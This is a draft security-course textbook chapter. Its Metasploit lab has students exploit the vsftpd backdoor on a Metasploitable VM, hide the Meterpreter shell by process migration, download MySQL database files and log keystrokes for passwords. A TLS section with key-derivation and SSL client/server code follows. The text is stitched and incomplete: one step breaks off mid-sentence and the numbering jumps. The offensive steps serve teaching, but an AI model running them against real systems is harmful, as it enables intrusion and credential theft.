Chapter 13 Metasploit

13.1 Background

Metasploit is an exploitation framework developed by Rapid7. In this section we walk through the steps an attacker would take to break into a web server and the database containing the passwords for the website.

13.2 Using Exploits

Step 1 Start up the Metasploitable virtual machine. This machine is the web server we attack in this exercise. Log in with username: msfadmin, password: msfadmin, and get the IP address of the Metasploitable machine by running the ifconfig command. Write it down; you will need it in a later step.

[Include Screen Shot]

Step 2 Click on the Metasploit icon. [Include picture]

[Include screen shot Metasploit Console]

Step 3 The Metasploit Framework is made up of a collection of modules. Each module contains code designed to execute a particular exploit. In the next lab we explore how modules are implemented by writing our own; for this lab we use an existing Metasploit module. We begin by loading the module that executes the FTP exploit (this runs the attack from Chapter 2):

use exploit/unix/ftp/vsftpd_234_backdoor

[include screen shot]

Step 4 Next, set the IP address of the target that you want to attack (the Metasploitable address you wrote down in Step 1):

set RHOSTS <target-ip>

Step 5 Run the command below to run the exploit and upload the Metasploit payload (Meterpreter):

exploit

[include screenshot ]

13.3 Hiding the Meterpreter process by migrating it

Once the attacker has uploaded a Meterpreter payload, they do not want the user to notice the process and kill it, so they often hide the Meterpreter process by migrating it into another process.

Step 6 Get a list of the running processes by running the ps command:

ps

[include screenshot]

Step 7 Migrate the Meterpreter process into another process by running the command below, replacing the process ID with one from the list:

migrate 682 [Update to match a process in the list]

13.4 Exploring the file system

Now that you have run the exploit and uploaded the Metasploit payload, you should have a reverse shell. Let's explore the file system on the web server.

Step 8 Run the pwd command. Notice that it prints the current working directory of the process.

[include screenshot]

Step 9 Navigate to the directory containing the database files by running the following command:

cd /var/lib/mysql/

[include screenshot]

Step 10 Download one of the database files by running the command below:

download [filename]

[Include screen shot]

13.5 Key Logging

You have successfully retrieved the database file from the system, but you still do not know the admin password. Knowing it would make it much more convenient to log back into this system, and even into other systems, without creating too much noise.

[Meterpreter only captures keystrokes for the process that you are currently in.] Step 11 Install a keylogger so that you can collect usernames and passwords from the system by running the



[Include Screen shot]


**Step 12** Test the keylogger by logging into the Metasploitable virtual machine and running the sudo command. (Username: msfadmin, password: msfadmin)

[Include screenshot]


**Step 13** Open the window containing the Meterpreter session and run the command `keyscan_dump`. Notice anything?
[Include screenshot below]

<!--chapter:end:14-Metasploit.Rmd-->

# Writing a Metasploit module


## Background


## Setup
**Step 1** Open the terminal and navigate to the Metasploit modules directory by running `cd ~/.msf4/modules`


**Step 2** Open Visual Studio Code (if you haven't already).

<!--chapter:end:15-WritingAMetasploitModule.Rmd-->

# Secure Sockets: SSL and TLS


## Background 
In this section we discuss the TLS protocol in detail, and we also use Wireshark to look at a sample TLS session. For additional details on TLS you can read the formal specification, RFC 5246: https://tools.ietf.org/html/rfc5246#section-8.1.2.



### Key Exchange


### How are keys derived from the pre-master secret?
The length of the pre-master secret varies depending on the type of key exchange algorithm that is used. However, to ensure that messages are both authentic and confidential, TLS needs a fixed-length message authentication code (MAC) key and a fixed-length encryption key, and it needs these keys for both the client and the server. TLS solves this by first deriving a fixed-length (48-byte) master secret from the variable-length pre-master secret.
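As an added worked example (not code from the original notes), the derivation this section describes, carried through for TLS 1.2 with the SHA-256 PRF of RFC 5246: the 48-byte master secret is derived from the pre-master secret and the two handshake randoms, then expanded into the key block and cut into the per-direction keys, here using the key sizes of TLS_RSA_WITH_AES_128_GCM_SHA256 (no MAC key, 16-byte keys, 4-byte fixed IVs). All input values are constructed, not taken from a real handshake.

```python
import hmac
import hashlib


def tls12_prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """TLS 1.2 PRF (RFC 5246 section 5): P_SHA256(secret, label + seed), cut to length."""
    seed = label + seed
    a = seed                       # A(0) = seed
    out = b""
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()            # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return out[:length]


def derive_master_secret(pre_master_secret: bytes, client_random: bytes, server_random: bytes) -> bytes:
    """48-byte master secret (RFC 5246 section 8.1); seed is client_random + server_random."""
    return tls12_prf(pre_master_secret, b"master secret", client_random + server_random, 48)


def derive_key_block(master_secret: bytes, client_random: bytes, server_random: bytes,
                     mac_key_length: int, enc_key_length: int, fixed_iv_length: int) -> dict:
    """Expand the master secret and cut the key block into per-direction keys
    (RFC 5246 section 6.3). Note the seed order flips: server_random + client_random."""
    total = 2 * (mac_key_length + enc_key_length + fixed_iv_length)
    key_block = tls12_prf(master_secret, b"key expansion", server_random + client_random, total)
    names = ["client_write_MAC_key", "server_write_MAC_key",
             "client_write_key", "server_write_key",
             "client_write_IV", "server_write_IV"]
    sizes = [mac_key_length, mac_key_length, enc_key_length, enc_key_length,
             fixed_iv_length, fixed_iv_length]
    keys, offset = {}, 0
    for name, size in zip(names, sizes):   # slice the key block in the order the RFC lists
        keys[name] = key_block[offset:offset + size]
        offset += size
    return keys


# Constructed sample inputs standing in for a real handshake (not captured values).
PRE_MASTER_SECRET = b"\x03\x03" + bytes(range(46))   # 48-byte RSA-style pre-master secret
CLIENT_RANDOM = bytes([0x11] * 32)
SERVER_RANDOM = bytes([0x22] * 32)

if __name__ == "__main__":
    ms = derive_master_secret(PRE_MASTER_SECRET, CLIENT_RANDOM, SERVER_RANDOM)
    # TLS_RSA_WITH_AES_128_GCM_SHA256: AEAD, so no MAC key; 16-byte keys; 4-byte fixed IVs
    for name, value in derive_key_block(ms, CLIENT_RANDOM, SERVER_RANDOM, 0, 16, 4).items():
        print(f"{name:22s} {value.hex()}")
```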

```
master_secret = PRF(pre_master_secret, "master secret",
                    ClientHello.random + ServerHello.random)
                    [0..47];
```

This master secret is then expanded into a key block that is cut up into four keys:

```
client_write_MAC_key[SecurityParameters.mac_key_length]
server_write_MAC_key[SecurityParameters.mac_key_length]
client_write_key[SecurityParameters.enc_key_length]
server_write_key[SecurityParameters.enc_key_length]
```

The PRF is defined as:

```
PRF(secret, label, seed) = P_<hash>(secret, label + seed)

P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                       HMAC_hash(secret, A(2) + seed) +
                       HMAC_hash(secret, A(3) + seed) + ...
```

where + indicates concatenation, and A() is defined as:

```
A(0) = seed
A(i) = HMAC_hash(secret, A(i-1))
```

HMAC = Hash-based Message Authentication Code.

The code below shows a sample Python program that implements the PRF function above, using SHA-256 as the hash (the PRF hash of TLS 1.2):

```python
import hmac
import hashlib


def PRF(secret, label, seed, length=48):
    """TLS 1.2 PRF: P_SHA256(secret, label + seed), truncated to `length` bytes (48 for the master secret)."""
    secSeed = label + seed
    a = secSeed                    # A(0) = seed
    masterkey = b''
    while len(masterkey) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()                  # A(i) = HMAC(secret, A(i-1))
        masterkey += hmac.new(secret, a + secSeed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)

    return masterkey[:length]
```

13.6 Writing an SSL Client

```python
import socket
import ssl

hostname = 'www.python.org'
context = ssl.create_default_context()        # verifies the server certificate and hostname
sock = socket.create_connection((hostname, 443))
secureSocket = context.wrap_socket(sock, server_hostname=hostname)
# SSLSocket does not support recvfrom(); send a request, then read the response with recv()
secureSocket.sendall(b'GET / HTTP/1.1\r\nHost: www.python.org\r\nConnection: close\r\n\r\n')
print(secureSocket.recv(1024))
secureSocket.close()
```

## Writing an SSL server

```python
import socket
import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('/path/to/certchain.pem', '/path/to/private.key')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.bind(('127.0.0.1', 8443))
sock.listen(1)
secureSocket = context.wrap_socket(sock, server_side=True)
conn, addr = secureSocket.accept()   # the TLS handshake is performed here
```

13.7 Challenge

Now that we have discussed TLS, you can try running the SMTP spoof over a TLS connection.